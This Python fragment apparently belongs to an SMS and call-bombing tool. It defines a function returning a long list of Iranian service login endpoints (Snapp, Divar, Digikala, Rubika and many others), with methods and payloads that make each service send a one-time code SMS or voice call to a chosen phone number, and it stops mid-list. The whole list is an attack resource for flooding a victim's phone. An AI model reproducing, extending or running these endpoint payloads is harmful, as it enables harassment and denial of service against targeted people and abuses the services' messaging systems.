
def API_LIST(phoneNumber:str):
    phoneNumber_countryCode = phoneNumber.replace('+98', '')
    phoneNumber_zero = "0" + phoneNumber.replace('+98', '')

    return [
    {"name": "Snapp", "method": "POST", "url": "https://app.snapp.taxi/api/api-passenger-oauth/v3/mutotp", "payload": {"cellphone": phoneNumber_countryCode}},
    {"name": "Snapp V2", "method": "POST", "url": "https://app.snapp.taxi/api/api-passenger-oauth/v2/otp", "payload": {"cellphone": phoneNumber}},
    {"name": "Tap30", "method": "POST", "url": "https://tap33.me/api/v2/user", "payload": {"credential": {"phoneNumber": phoneNumber_zero, "role": "PASSENGER"}}},
    {"name": "Divar", "method": "POST", "url": "https://api.divar.ir/v5/auth/authenticate", "payload": {"phone": phoneNumber}},
    {"name": "SnappFood", "method": "POST", "url": "https://snappfood.ir/mobile/v2/user/loginMobileWithNoPass", "payload": {"cellphone": phoneNumber_zero, "client": "PWA"}},
    {"name": "Torob", "method": "GET", "url": "https://api.torob.com/a/phone/send-pin/", "params": {"phone_number": phoneNumber_zero}},
    {"name": "Gap", "method": "GET", "url": "https://core.gap.im/v1/user/add.json", "params": {"mobile": phoneNumber}},
    {"name": "Sheypoor", "method": "POST", "url": "https://www.sheypoor.com/auth", "data": {"username": phoneNumber_zero}},
    {"name": "AliBaba", "method": "POST", "url": "https://ws.alibaba.ir/api/v3/account/mobile/otp", "payload": {"phoneNumber": phoneNumber_zero}},
    {"name": "Snapp Market", "method": "POST", "url": "https://api.snapp.market/mart/v1/user/loginMobileWithNoPass", "params": {"cellphone": phoneNumber_zero}},
    {"name": "GapFilm", "method": "POST", "url": "https://core.gapfilm.ir/api/v3.1/Account/Login", "payload": {"Type": 3, "Username": phoneNumber, "SourceChannel": "GF_WebSite"}},
    {"name": "FilmNet", "method": "GET", "url": "https://api-v2.filmnet.ir/access-token/users/" + phoneNumber + "/otp"},
    {"name": "DrDr", "method": "POST", "url": "https://drdr.ir/api/registerEnrollment/sendDisposableCode", "params": {"phoneNumber": phoneNumber, "userType": "PATIENT"}},
    {"name": "Banimode", "method": "POST", "url": "https://mobapi.banimode.com/api/v2/auth/request", "payload": {"phone": phoneNumber_zero}},
    {"name": "BaSalam", "method": "POST", "url": "https://api.basalam.com/user", "payload": {"variables": {"mobile": phoneNumber_zero}, "query": "mutation verificationCodeRequest($mobile: MobileScalar!) { mobileVerificationCodeRequest(mobile: $mobile) { success } }"}},
    {"name": "Nobat.ir", "method": "POST", "url": "https://nobat.ir/api/public/patient/login/phone", "data": {"mobile": phoneNumber_zero}},
    {"name": "Alopeyk", "method": "POST", "url": "https://api.alopeyk.com/api/v2/login?platform=pwa", "payload": {"type": "CUSTOMER", "phone": phoneNumber}},
    {"name": "ShahrFarsh", "method": "POST", "url": "https://shahrfarsh.com/Account/Login", "data": {"phoneNumber": phoneNumber_zero}},
    {"name": "DigiStyle", "method": "POST", "url": "https://www.digistyle.com/users/login-register/", "data": {"loginRegister[email_phone]": phoneNumber_zero}},
    {"name": "Snapp Express", "method": "POST", "url": "https://api.snapp.express/mobile/v4/user/loginMobileWithNoPass", "data": {"cellphone": phoneNumber_zero}},
    {"name": "Azki", "method": "POST", "url": "https://www.azki.com/api/vehicleorder/v2/app/auth/check-login-availability/", "payload": {"phoneNumber": phoneNumber_zero}},
    {"name": "Digikala Jet", "method": "POST", "url": "https://api.digikalajet.ir/user/login-register/", "payload": {"phone": phoneNumber_zero}},
    {"name": "Snapp Drivers", "method": "POST", "url": "https://digitalsignup.snapp.ir/ds3/api/v3/otp", "payload": {"cellphone": phoneNumber_zero}},
    {"name": "Ostadkar", "method": "POST", "url": "https://api.ostadkr.com/login", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Miare", "method": "POST", "url": "https://www.miare.ir/api/otp/driver/request/", "payload": {"phone_number": phoneNumber_zero}},
    {"name": "Tapsi Drivers", "method": "POST", "url": "https://api.tapsi.ir/api/v2.2/user", "payload": {"credential": {"phoneNumber": phoneNumber_zero, "role": "DRIVER"}, "otpOption": "SMS"}},
    {"name": "Taaghche", "method": "POST", "url": "https://gw.taaghche.com/v4/site/auth/login", "payload": {"contact": phoneNumber_zero, "forceOtp": False}},
    {"name": "Mobit", "method": "POST", "url": "https://api.mobit.ir/api/web/v8/register/register", "payload": {"number": phoneNumber_zero}},
    {"name": "Jabama", "method": "POST", "url": "https://taraazws.jabama.com/api/v4/account/send-code", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Ghabzino", "method": "POST", "url": "https://application2.billingsystem.ayantech.ir/WebServices/Core.svc/requestActivationCode", "payload": {"Parameters": {"ApplicationType": "Web", "MobileNumber": phoneNumber_zero}}},
    {"name": "Komodaa", "method": "POST", "url": "https://api.komodaa.com/api/v2.6/loginRC/request", "payload": {"phone_number": phoneNumber_zero}},
    {"name": "Bargh-e Man", "method": "POST", "url": "https://uiapi2.saapa.ir/api/otp/sendCode", "payload": {"mobile": phoneNumber_zero, "from_meter_buy": False}},
    {"name": "Vandar", "method": "POST", "url": "https://api.vandar.io/account/v1/check/mobile", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Pinorest", "method": "POST", "url": "https://api.pinorest.com/frontend/auth/login/mobile", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Tetherland", "method": "POST", "url": "https://service.tetherland.com/api/v5/login-register", "payload": {"mobile": phoneNumber_zero}},
    {"name": "DrNext", "method": "POST", "url": "https://cyclops.drnext.ir/v1/patients/auth/send-verification-token", "payload": {"source": "besina", "mobile": phoneNumber_zero}},
    {"name": "Classino", "method": "POST", "url": "https://student.classino.com/otp/v1/api/login", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Behtarino", "method": "POST", "url": "https://bck.behtarino.com/api/v1/users/jwt_phone_verification/", "payload": {"phone": phoneNumber_zero}},
    {"name": "Bit24", "method": "POST", "url": "https://bit24.cash/auth/bit24/api/v3/auth/check-mobile", "payload": {"mobile": phoneNumber_zero, "contry_code": "98"}},
    {"name": "Doctoreto", "method": "GET", "url": "https://api.doctoreto.com/api/web/patient/v1/accounts/register", "params": {"mobile": phoneNumber, "country_id": 205}},
    {"name": "Okala", "method": "POST", "url": "https://api-react.okala.com/C/CustomerAccount/OTPRegister", "payload": {"mobile": phoneNumber_zero, "deviceTypeCode": 0, "confirmTerms": True, "notRobot": False}},
    {"name": "Beroozmarket", "method": "POST", "url": "https://api.beroozmart.com/api/pub/account/send-otp", "payload": {"mobile": phoneNumber_zero, "sendViaSms": True}},
    {"name": "Itoll", "method": "POST", "url": "https://app.itoll.com/api/v1/auth/login", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Pinket", "method": "POST", "url": "https://pinket.com/api/cu/v2/phone-verification", "payload": {"phoneNumber": phoneNumber_zero}},
    {"name": "Football360", "method": "POST", "url": "https://football360.ir/api/auth/verify-phone/", "payload": {"phone_number": phoneNumber}},
    {"name": "MrBilit", "method": "GET", "url": "https://auth.mrbilit.com/api/login/exists/v2", "params": {"mobileOrEmail": phoneNumber_zero, "source": 2, "sendTokenIfNot": "true"}},
    {"name": "HamrahMechanic", "method": "POST", "url": "https://www.hamrah-mechanic.com/api/v1/membership/otp", "payload": {"PhoneNumber": phoneNumber_zero}},
    {"name": "Lendo", "method": "POST", "url": "https://api.lendo.ir/api/customer/auth/send-otp", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Fidibo", "method": "POST", "url": "https://fidibo.com/user/login-by-sms", "data": "mobile_number=" + phoneNumber_countryCode + "&country_code=ir"},
    {"name": "Khodro45", "method": "POST", "url": "https://khodro45.com/api/v1/customers/otp/", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Pateh", "method": "POST", "url": "https://api.pateh.com/api/v1/LoginOrRegister", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Ketabchi", "method": "POST", "url": "https://ketabchi.com/api/v1/auth/requestVerificationCode", "payload": {"auth": {"phoneNumber": phoneNumber_zero}}},
    {"name": "RayanErtebat", "method": "POST", "url": "https://pay.rayanertebat.ir/api/User/Otp", "payload": {"mobileNo": phoneNumber_zero}},
    {"name": "Bimito", "method": "POST", "url": "https://bimito.com/api/vehicleorder/v2/app/auth/login-with-verify-code", "payload": {"phoneNumber": phoneNumber_zero, "isResend": False}},
    {"name": "Pindo", "method": "POST", "url": "https://api.pindo.ir/v1/user/login-register/", "payload": {"phone": phoneNumber_zero}},
    {"name": "Delino", "method": "POST", "url": "https://www.delino.com/user/register", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Zoodex", "method": "POST", "url": "https://admin.zoodex.ir/api/v1/login/check", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Kukala", "method": "POST", "url": "https://api.kukala.ir/api/user/Otp", "payload": {"phoneNumber": phoneNumber_zero}},
    {"name": "Baskool", "method": "POST", "url": "https://www.buskool.com/send_verification_code", "payload": {"phone": phoneNumber_zero}},
    {"name": "3tex", "method": "POST", "url": "https://3tex.io/api/1/users/validation/mobile", "payload": {"receptorPhone": phoneNumber_zero}},
    {"name": "DeniizShop", "method": "POST", "url": "https://deniizshop.com/api/v1/sessions/login_request", "payload": {"mobile_number": phoneNumber_zero}},
    {"name": "Flightio", "method": "POST", "url": "https://flightio.com/bff/Authentication/CheckUserKey", "payload": {"userKey": phoneNumber_zero}},
    {"name": "AbanTether", "method": "POST", "url": "https://abantether.com/users/register/phone/send/", "payload": {"phoneNumber": phoneNumber_zero}},
    {"name": "Pooleno", "method": "POST", "url": "https://api.pooleno.ir/v1/auth/check-mobile", "payload": {"mobile": phoneNumber_zero}},
    {"name": "WideApp", "method": "POST", "url": "https://agent.wide-app.ir/auth/token", "payload": {"grant_type": "otp", "client_id": "62b30c4af53e3b0cf100a4a0", "phone": phoneNumber_zero}},
    {"name": "BitBarg", "method": "POST", "url": "https://api.bitbarg.com/api/v1/authentication/registerOrLogin", "payload": {"phone": phoneNumber_zero}},
    {"name": "BahramShop", "method": "POST", "url": "https://api.bahramshop.ir/api/user/validate/username", "payload": {"username": phoneNumber_zero}},
    {"name": "Chamedoon", "method": "POST", "url": "https://chamedoon.com/api/v1/membership/guest/request_mobile_verification", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Kilid", "method": "POST", "url": "https://server.kilid.com/global_auth_api/v1.0/authenticate/login/realm/otp/start?realm=PORTAL", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Otaghak", "method": "POST", "url": "https://core.otaghak.com/odata/Otaghak/Users/SendVerificationCode", "payload": {"userName": phoneNumber_zero}},
    {"name": "Shab", "method": "POST", "url": "https://www.shab.ir/api/fa/sandbox/v_1_4/auth/enter-mobile", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Raybit", "method": "POST", "url": "https://api.raybit.net:3111/api/v1/authentication/register/mobile", "payload": {"mobile": phoneNumber_zero}},
    {"name": "FarviShop", "method": "POST", "url": "https://farvi.shop/api/v1/sessions/login_request", "payload": {"mobile_phone": phoneNumber_zero}},
    {"name": "Namava", "method": "POST", "url": "https://www.namava.ir/api/v1.0/accounts/registrations/by-phone/request", "payload": {"UserName": phoneNumber_zero}},
    {"name": "a4baz", "method": "POST", "url": "https://a4baz.com/api/web/login", "payload": {"cellphone": phoneNumber_zero}},
    {"name": "AnarGift", "method": "POST", "url": "https://api.anargift.com/api/people/auth", "payload": {"user": phoneNumber_zero}},
    {"name": "Simkhan", "method": "POST", "url": "https://www.simkhanapi.ir/api/users/registerV2", "payload": {"mobileNumber": phoneNumber_zero}},
    {"name": "SibIrani", "method": "POST", "url": "https://sandbox.sibirani.ir/api/v1/user/invite", "payload": {"username": phoneNumber_zero}},
    {"name": "HyperJan", "method": "POST", "url": "https://shop.hyperjan.ir/api/users/manage", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Digikala", "method": "POST", "url": "https://api.digikala.com/v1/user/authenticate/", "payload": {"username": phoneNumber_zero}},
    {"name": "HiWord", "method": "POST", "url": "https://hiword.ir/wp-json/otp-login/v1/login", "payload": {"identifier": phoneNumber_zero}},
    {"name": "Tikban", "method": "POST", "url": "https://tikban.com/Account/LoginAndRegister", "payload": {"cellPhone": phoneNumber_zero}},
    {"name": "Dicardo", "method": "POST", "url": "https://dicardo.com/main/sendsms", "payload": {"phone": phoneNumber_zero}},
    {"name": "Khanoumi", "method": "POST", "url": "https://www.khanoumi.com/accounts/sendotp", "payload": {"mobile": phoneNumber_zero}},
    {"name": "RojaShop", "method": "POST", "url": "https://rojashop.com/api/auth/sendOtp", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Dadpardaz", "method": "POST", "url": "https://dadpardaz.com/advice/getLoginConfirmationCode", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Rokla", "method": "POST", "url": "https://api.rokla.ir/api/request/otp", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Pezeshket", "method": "POST", "url": "https://api.pezeshket.com/core/v1/auth/requestCode", "payload": {"mobileNumber": phoneNumber_zero}},
    {"name": "Virgool", "method": "POST", "url": "https://virgool.io/api/v1.4/auth/verify", "payload": {"method": "phone", "identifier": phoneNumber_zero}},
    {"name": "Timcheh", "method": "POST", "url": "https://api.timcheh.com/auth/otp/send", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Paklean", "method": "POST", "url": "https://client.api.paklean.com/user/resendCode", "payload": {"username": phoneNumber_zero}},
    {"name": "Daal", "method": "POST", "url": "https://daal.co/api/authentication/login-register/method/phone-otp/user-role/customer/verify-request", "payload": {"phone": phoneNumber_zero}},
    {"name": "Bimebazar", "method": "POST", "url": "https://bimebazar.com/accounts/api/login_sec/", "payload": {"username": phoneNumber_zero}},
    {"name": "SafarMarket", "method": "POST", "url": "https://safarmarket.com//api/security/v2/user/otp", "payload": {"phone": phoneNumber_zero}},
    {"name": "Shad", "method": "POST", "url": "https://shadmessenger12.iranlms.ir/", "payload": {"api_version": "3", "method": "sendCode", "data": {"phone_number": "098" + phoneNumber_countryCode + "", "send_type": "SMS"}}},
    {"name": "Emtiaz", "method": "POST", "url": "https://web.emtiyaz.app/json/login", "data": "send=1&cellphone=" + phoneNumber_zero + ""},
    {"name": "Rubika", "method": "POST", "url": "https://messengerg2c4.iranlms.ir/", "payload": {"api_version": "3", "method": "sendCode", "data": {"phone_number": phoneNumber, "send_type": "SMS"}}},
    {"name": "Bama", "method": "POST", "url": "https://bama.ir/signin-checkforcellnumber", "data": "cellNumber=" + phoneNumber_zero + ""},
    {"name": "Snapp Doctor", "method": "GET", "url": "https://core.snapp.doctor/Api/Common/v1/sendVerificationCode/" + phoneNumber_countryCode + "/sms?cCode=+98"},
    {"name": "Bitpin", "method": "POST", "url": "https://api.bitpin.ir/v1/usr/sub_phone/", "payload": {"phone": phoneNumber_zero}},
    {"name": "Trip (Call)", "method": "POST", "url": "https://gateway.trip.ir/api/Totp", "payload": {"PhoneNumber": phoneNumber_zero}},
    {"name": "Paklean (Call)", "method": "POST", "url": "https://client.api.paklean.com/user/resendVoiceCode", "payload": {"username": phoneNumber_zero}},
    {"name": "Ragham (Call)", "method": "POST", "url": "https://web.raghamapp.com/api/users/code", "payload": {"phone": phoneNumber}},
    {"name": "Achareh", "method": "POST", "url": "https://api.achareh.co/v2/accounts/login/", "payload": {"phone": "98" + phoneNumber_countryCode + ""}},
    {"name": "Zigap", "method": "POST", "url": "https://zigap.smilinno-dev.com/api/v1.6/authenticate/sendotp", "payload": {"phoneNumber": phoneNumber}},
    {"name": "Mootanroo", "method": "POST", "url": "https://api.mootanroo.com/api/v3/auth/send-otp", "payload": {"PhoneNumber": phoneNumber_zero}},
    {"name": "Tebinja", "method": "POST", "url": "https://www.tebinja.com/api/v1/users", "payload": {"username": phoneNumber_zero}},
    {"name": "Dosma", "method": "POST", "url": "https://app.dosma.ir/api/v1/account/send-otp/", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Sibbazar", "method": "POST", "url": "https://sandbox.sibbazar.com/api/v1/user/invite", "payload": {"username": phoneNumber_zero}},
    {"name": "Pubisha", "method": "POST", "url": "https://www.pubisha.com/login/checkCustomerActivation", "data": "mobile=" + phoneNumber_zero + ""},
    {"name": "Wisgoon", "method": "POST", "url": "https://gateway.wisgoon.com/api/v1/auth/login/", "payload": {"phone": phoneNumber_zero}},
    {"name": "Tagmond", "method": "POST", "url": "https://tagmond.com/phone_number", "data": "phone_number=" + phoneNumber_zero + ""},
    {"name": "Olgoo", "method": "POST", "url": "https://www.olgoobooks.ir/sn/userRegistration/", "data": {"contactInfo[mobile]": phoneNumber_zero}},
    {"name": "PakhshShop", "method": "POST", "url": "https://www.pakhsh.shop/wp-admin/admin-ajax.php", "data": "action=digits_check_mob&mobileNo=" + phoneNumber_zero + ""},
    {"name": "Didnegar", "method": "POST", "url": "https://www.didnegar.com/wp-admin/admin-ajax.php", "data": "action=digits_check_mob&mobileNo=" + phoneNumber_countryCode + ""},
    {"name": "See5", "method": "POST", "url": "https://crm.see5.net/api_ajax/sendotp.php", "data": {"mobile": phoneNumber_zero, "action": "sendsms"}},
    {"name": "DrSaina", "method": "POST", "url": "https://www.drsaina.com/RegisterLogin", "data": "PhoneNumber=" + phoneNumber_zero + ""},
    {"name": "Limome", "method": "POST", "url": "https://my.limoome.com/api/auth/login/otp", "data": {"mobileNumber": phoneNumber, "country": "1"}},
    {"name": "Devsloop", "method": "POST", "url": "https://i.devslop.app/app/ifollow/api/otp.php", "data": "number=" + phoneNumber_zero + "&state=number"},
    {"name": "Ghasedak24", "method": "POST", "url": "https://ghasedak24.com/user/ajax_register", "data": {"username": phoneNumber_zero}},
    {"name": "Iranketab", "method": "POST", "url": "https://www.iranketab.ir/account/register", "data": {"UserName": phoneNumber_zero}},
    {"name": "Takfarsh", "method": "POST", "url": "https://takfarsh.com/wp-content/themes/bakala/template-parts/send.php", "data": {"phone_email": phoneNumber_zero}},
    {"name": "Iranicard", "method": "POST", "url": "https://api.iranicard.ir/api/v1/register", "data": {"mobile": phoneNumber_zero}},
    {"name": "PubgSell", "method": "GET", "url": "https://pubg-sell.ir/loginuser?username=" + phoneNumber_zero + ""},
    {"name": "Tj8", "method": "POST", "url": "https://tj8.ir/auth/register", "data": {"mobile": phoneNumber_zero}},
    {"name": "Mashinbank", "method": "POST", "url": "https://mashinbank.com/api2/users/check", "data": {"mobileNumber": phoneNumber_zero}},
    {"name": "Cinematicket", "method": "POST", "url": "https://cinematicket.org/api/v1/users/signup", "payload": {"phone_number": phoneNumber_zero}},
    {"name": "Kafegheymat", "method": "POST", "url": "https://kafegheymat.com/shop/getLoginSms", "data": {"phone": phoneNumber_zero}},
    {"name": "Opco", "method": "POST", "url": "https://shop.opco.co.ir/index.php?route=extension/module/login_verify/update_register_code", "data": {"telephone": phoneNumber_zero}},
    {"name": "Melix", "method": "POST", "url": "https://melix.shop/site/api/v1/user/otp", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Safiran", "method": "POST", "url": "https://safiran.shop/login", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Pirankalaco", "method": "POST", "url": "https://pirankalaco.ir/shop/SendPhone.php", "data": "phone=" + phoneNumber_zero + ""},
    {"name": "Tnovin", "method": "POST", "url": "http://shop.tnovin.com/login", "data": "phone=" + phoneNumber_zero + ""},
    {"name": "Dastakht", "method": "POST", "url": "https://dastkhat-isad.ir/api/v1/user/store", "payload": {"mobile": phoneNumber, "countryCode": 98, "device_os": 2}},
    {"name": "Hamlex", "method": "POST", "url": "https://hamlex.ir/register.php", "data": "phoneNumber=" + phoneNumber_zero + "&register="},
    {"name": "Irwco", "method": "POST", "url": "https://irwco.ir/register", "data": "mobile=" + phoneNumber_zero + ""},
    {"name": "Moshaveran724", "method": "POST", "url": "https://moshaveran724.ir/m/pms.php", "data": "againkey=" + phoneNumber_zero + "&cache=false"},
    {"name": "Sibbank", "method": "POST", "url": "https://api.sibbank.ir/v1/auth/login", "payload": {"phone_number": phoneNumber_zero}},
    {"name": "Steelalborz", "method": "POST", "url": "https://steelalborz.com/wp-admin/admin-ajax.php", "data": "action=digits_check_mob&mobileNo=" + phoneNumber_zero + ""},
    {"name": "Arshian", "method": "POST", "url": "https://api.arshiyan.com/send_code", "payload": {"country_code": "98", "phone_number": phoneNumber}},
    {"name": "Topnoor", "method": "POST", "url": "https://backend.topnoor.ir/web/v1/user/otp", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Alinance", "method": "POST", "url": "https://api.alinance.com/user/register/mobile/send/", "payload": {"phone_number": phoneNumber_zero}},
    {"name": "Alopeyk Safir", "method": "POST", "url": "https://api.alopeyk.com/safir-service/api/v1/login", "payload": {"phone": phoneNumber_zero}},
    {"name": "Chaymarket", "method": "POST", "url": "https://www.chaymarket.com/wp-admin/admin-ajax.php", "data": "action=digits_check_mob&mobileNo=" + phoneNumber_zero + ""},
    {"name": "Ehteraman", "method": "POST", "url": "https://api.ehteraman.com/api/request/otp", "payload": {"mobile": phoneNumber_zero}},
    {"name": "MCI Shop", "method": "POST", "url": "https://api-ebcom.mci.ir/services/auth/v1.0/otp", "payload": {"msisdn": phoneNumber}},
    {"name": "Hamrahbours", "method": "POST", "url": "https://api.hbbs.ir/authentication/SendCode", "payload": {"MobileNumber": phoneNumber_zero}},
    {"name": "Homtick", "method": "POST", "url": "https://auth.homtick.com/api/V1/User/GetVerifyCode", "payload": {"mobileOrEmail": phoneNumber_zero}},
    {"name": "Iranamlaak", "method": "POST", "url": "https://api.iranamlaak.net/authenticate/send/otp/to/mobile/via/sms", "payload": {"AgencyMobile": phoneNumber_zero}},
    {"name": "Karchidari", "method": "POST", "url": "https://api.kcd.app/api/v1/auth/login", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Mazoo", "method": "POST", "url": "https://mazoocandle.ir/login", "payload": {"phone": phoneNumber}},
    {"name": "Paymishe", "method": "POST", "url": "https://api.paymishe.com/api/v1/otp/registerOrLogin", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Podro", "method": "POST", "url": "https://api.pod.ir/api/v1/otp/registerOrLogin", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Rayshomar", "method": "POST", "url": "https://api.rayshomar.ir/api/Register/RegistrMobile", "data": "MobileNumber=" + phoneNumber_zero + ""},
    {"name": "Amoomilad", "method": "POST", "url": "https://amoomilad.demo-hoonammaharat.ir/api/v1.0/Account/Sendcode", "payload": {"PhoneNumber": phoneNumber_zero}},
    {"name": "Bitex24", "method": "GET", "url": "https://bitex24.com/api/v1/auth/sendSms?mobile=" + phoneNumber_zero + "&dial_code=0"},
    {"name": "Candoosms", "method": "POST", "url": "https://www.candoosms.com/wp-admin/admin-ajax.php", "data": "action=send_sms&phone=" + phoneNumber_zero + ""},
    {"name": "Offch", "method": "POST", "url": "https://api.offch.com/auth/otp", "payload": {"username": phoneNumber_zero}},
    {"name": "Sabziman", "method": "POST", "url": "https://sabziman.com/wp-admin/admin-ajax.php", "data": "action=newphoneexist&phonenumber=" + phoneNumber_zero + ""},
    {"name": "Tajtehran", "method": "POST", "url": "https://tajtehran.com/RegisterRequest", "data": "mobile=" + phoneNumber_zero + "&password=mamad1234"},
    {"name": "MrBilit (Call)", "method": "GET", "url": "https://auth.mrbilit.com/api/Token/send/byCall?mobile=" + phoneNumber_zero + ""},
    {"name": "Gap (Call)", "method": "GET", "url": "https://core.gap.im/v1/user/resendCode.json?mobile=" + phoneNumber + "&type=IVR"},
    {"name": "Novibook (Call)", "method": "POST", "url": "https://novinbook.com/index.php?route=account/phone", "data": "phone=" + phoneNumber_zero + "&call=yes"},
    {"name": "Azki (Call)", "method": "GET", "url": "https://www.azki.com/api/vehicleorder/api/customer/register/login-with-vocal-verification-code?phoneNumber=" + phoneNumber_zero + ""},
    {"name": "Janebi", "method": "POST", "url": "https://janebi.com/signin?do", "data": {"resend": phoneNumber_zero}},
    {"name": "4hair", "method": "POST", "url": "https://4hair.ir/user/login.php", "data": {"num": phoneNumber_zero, "ok": ""}},
    {"name": "iGame", "method": "POST", "url": "https://igame.ir/api/play/otp/send", "payload": {"phone": phoneNumber_zero}},
    {"name": "TWsms", "method": "POST", "url": "https://twsms.ir/client/register.php", "data": {"mobile": phoneNumber_zero, "agree": "agree", "sendsms": "1"}},
    {"name": "BaradaranToy", "method": "POST", "url": "https://baradarantoy.ir/send_confirm_sms_ajax.php", "data": {"user_tel": phoneNumber_zero}},
    {"name": "KavirMotor", "method": "POST", "url": "https://kavirmotor.com/sms/send", "payload": {"phoneNumber": phoneNumber_zero}},
    {"name": "Chechilas", "method": "POST", "url": "https://chechilas.com/user/login", "data": {"mob": phoneNumber_zero}},
    {"name": "Searchii", "method": "POST", "url": "https://searchii.ir//controler//phone_otp.php", "data": {"mobile_number": phoneNumber_zero, "action": "send_otp", "login": "user"}},
    {"name": "Badparak", "method": "POST", "url": "https://badparak.com/register/request_verification_code", "payload": {"mobile": phoneNumber_zero}},
    {"name": "HermesKala", "method": "POST", "url": "https://hermeskala.com//login/send_vcode", "payload": {"mobile_number": phoneNumber_zero}},
    {"name": "ElinorBoutique", "method": "POST", "url": "https://api.elinorboutique.com/v1/customer/register-login", "payload": {"mobile": phoneNumber_zero}},
    {"name": "AtlasMode", "method": "POST", "url": "https://api.atlasmode.ir/v1/customer/register-login?version=new2", "payload": {"mobile": phoneNumber_zero}},
    {"name": "PooshakShoniz", "method": "POST", "url": "https://api.pooshakshoniz.com/v1/customer/register-login?version=new1", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Ubike", "method": "POST", "url": "https://ubike.ir/index.php?route=extension/module/websky_otp/send_code", "data": {"telephone": phoneNumber_zero}},
    {"name": "Benedito", "method": "POST", "url": "https://api.benedito.ir/v1/customer/register-login?version=new1", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Rubeston", "method": "POST", "url": "https://www.rubeston.com/api/customers/login-register", "payload": {"mobile": phoneNumber_zero, "step": "1"}},
    {"name": "PrimaShop", "method": "POST", "url": "https://primashop.ir/index.php?route=extension/module/websky_otp/send_code", "data": {"telephone": phoneNumber_zero}},
    {"name": "PayaGym", "method": "POST", "url": "https://payagym.com/wp-admin/admin-ajax.php", "data": {"mobile": phoneNumber_zero, "action": "kerasno_proform_register_inline_send"}},
    {"name": "Bartarinha", "method": "POST", "url": "https://bartarinha.com/Advertisement/Users/RequestLoginMobile", "data": {"mobileNo": phoneNumber_zero}},
    {"name": "ManoShahr", "method": "POST", "url": "https://manoshahr.ir/jq.php", "data": {"mobile": phoneNumber_zero, "class_name": "public_login", "function_name": "sendCode"}},
    {"name": "NalinoCo", "method": "POST", "url": "https://www.nalinoco.com/api/customers/login-register", "payload": {"mobile": phoneNumber_zero, "step": "1"}},
    {"name": "Hiss", "method": "POST", "url": "https://hiss.ir/wp-admin/admin-ajax.php", "data": {"phone_email": phoneNumber_zero, "action": "bakala_send_code"}},
    {"name": "Tahrir-Online", "method": "POST", "url": "https://tahrir-online.ir/wp-admin/admin-ajax.php", "data": {"phone": phoneNumber, "action": "mobix_send_otp_code"}},
    {"name": "MartDay", "method": "POST", "url": "https://martday.ir/api/customer/member/register/", "data": {"email": phoneNumber_zero, "accept_term": "on"}},
    {"name": "Paaakar", "method": "POST", "url": "https://api.paaakar.com/v1/customer/register-login?version=new1", "payload": {"mobile": phoneNumber_zero}},
    {"name": "ElectraStore", "method": "POST", "url": "https://electrastore.ir/index.php?route=extension/module/websky_otp/send_code", "data": {"telephone": phoneNumber_zero}},
    {"name": "AtrinElec", "method": "POST", "url": "https://www.atrinelec.com/ajax/SendSmsVerfiyCode", "data": {"mobile": phoneNumber_zero}},
    {"name": "KetabWeb", "method": "POST", "url": "https://ketabweb.com/login/?usernameCheck=1", "data": {"username": phoneNumber_zero}},
    {"name": "Dastaneman", "method": "POST", "url": "https://dastaneman.com/User/SendCode", "data": {"mobile": "0098" + phoneNumber_countryCode + ""}},
    {"name": "80w", "method": "POST", "url": "https://80w.ir/wp-admin/admin-ajax.php", "data": {"login": phoneNumber_zero, "action": "logini_first"}},
    {"name": "NoavarPub", "method": "POST", "url": "https://noavarpub.com/logins/login.php", "data": {"phone": phoneNumber_zero, "submit": "123"}},
    {"name": "HovalVakil", "method": "GET", "url": "https://api.hovalvakil.com/api/User/SendConfirmCode?userName=" + phoneNumber_countryCode + ""},
    {"name": "DigiGhate", "method": "GET", "url": "https://api.digighate.com/v2/public/code?phone=" + phoneNumber_countryCode + ""},
    {"name": "AzarbadBook", "method": "POST", "url": "https://azarbadbook.ir/ajax/login_j_ajax_ver/", "data": {"phone": phoneNumber}},
    {"name": "KanoonBook", "method": "POST", "url": "https://www.kanoonbook.ir/store/customer_otp", "data": {"customer_username": phoneNumber, "task": "customer_phone"}},
    {"name": "CheshmandazKetab", "method": "POST", "url": "https://www.cheshmandazketab.ir/Register", "data": {"phone": phoneNumber_zero, "login": "1"}},
    {"name": "Ketab.ir", "method": "GET", "url": "https://sso-service.ketab.ir/api/v2/signup/otp?Mobile=" + phoneNumber_zero + "&OtpSmsType=1"},
    {"name": "SnappShop", "method": "POST", "url": "https://apix.snappshop.co/auth/v1/pre-login", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Ketabium", "method": "POST", "url": "https://www.ketabium.com/login-register", "data": {"username": phoneNumber_zero}},
    {"name": "RiraBook", "method": "POST", "url": "https://rirabook.com/loginAth", "data": {"mobile1": phoneNumber_zero, "loginbt1": ""}},
    {"name": "PashikShoes", "method": "POST", "url": "https://api.pashikshoes.com/v1/customer/register-login", "payload": {"mobile": phoneNumber_zero}},
    {"name": "ShimaShoes", "method": "POST", "url": "https://shimashoes.com/api/customer/member/register/", "data": {"email": phoneNumber_zero}},
    {"name": "TamimPishro", "method": "POST", "url": "https://www.tamimpishro.com/site/api/v1/user/otp", "payload": {"mobile": phoneNumber_zero}},
